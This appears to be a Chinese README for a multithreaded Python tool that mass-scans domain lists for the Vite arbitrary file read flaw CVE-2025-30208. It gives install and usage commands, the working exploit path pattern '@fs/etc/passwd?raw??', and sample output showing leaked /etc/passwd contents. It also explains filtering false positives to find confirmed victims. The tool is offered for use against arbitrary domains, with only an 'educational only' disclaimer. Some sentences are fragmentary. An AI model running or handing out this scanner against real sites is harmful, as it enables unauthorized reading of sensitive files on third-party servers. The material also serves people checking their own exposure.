哟,这是 keklick1337 写的超牛逼多线程 Python 脚本,用来扫描 Vite 中受 CVE-2025-30208 影响的域名。基本上,它会检查你是否能通过 @fs 端点配合 ?raw?? 或 ?import&raw?? 获取任意文件——比如泄露 /etc/passwd 这类敏感数据。它内置了一些智能误报过滤,免得你在垃圾信息上浪费时间,还有选项可以调整输出的格式。
<head> 和 <body> 的响应,除非看起来正常。sourcemappingurl 或 export default 来确认漏洞存在。results_good.txt、results_maybe_good.txt、results_bad.txt)。-u 还可以带上 URL,如果你需要的话。requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt:要扫描的路径,每行一个(例如 /etc/passwd)。domains.txt:要扫描的域名,每行一个(例如 example.com)。像这样启动:
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file>:你的域名列表(没有文件就没得扫,废话)。-t, --threads:要启动的线程数(默认:10)。-p, --protocol:强制使用 http 或 https,不填默认两种都试。-u, --urls:把存在漏洞的 URL 加到输出里。-o, --output:文件名的前缀(默认:results)。-f, --format:txt 输出多个文件,jsonl 输出一个大文件(默认:txt)。python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt:绝对存在问题的目标(包含 sourcemappingurl 或 export default)。results_maybe_good.txt:可能有漏洞,但没有确凿证据。results_bad.txt:干净,没问题。-u 后,URL 会用制表符(\t)附加到后面。-u 的 results_good.txt 示例:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl、results_maybe_good.jsonl、results_bad.jsonl。domain:你扫描的域名。status:VULNERABLE、MAYBE VULNERABLE 或 BAD。url(如果使用了 -u):存在漏洞的 URL。response:服务器返回的内容。results_good.jsonl 示例:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake)。<head> 和 <body>,那就是误报——服务器只是在故意返回正常页面。@fs/<path>?raw?? 和 ?import&raw?? 尝试 path_list.txt 中的每个路径。<head> 和 <body> 的 HTML?直接跳过。sourcemappingurl 或 export default?好家伙,标记为 GOOD。MAYBE_GOOD。BAD。urllib3.disable_warnings()),所以它不会抱怨证书问题。在外部使用时小心点。path_list.txt——敏感文件才是真正重要的。听好了:这玩意儿仅供教育目的,兄弟。如果你用这玩意儿搞砸了什么、被抓了,或者惹恼了别人,我概不负责。用它来学习,别用来当傻逼。所有风险自负,妈的——我只是在这里分享代码。
有想法?发现了 bug?给我提 issue 或 pull request。有更多消除误报的方法或者很酷的功能?让这个神器变得更牛逼吧。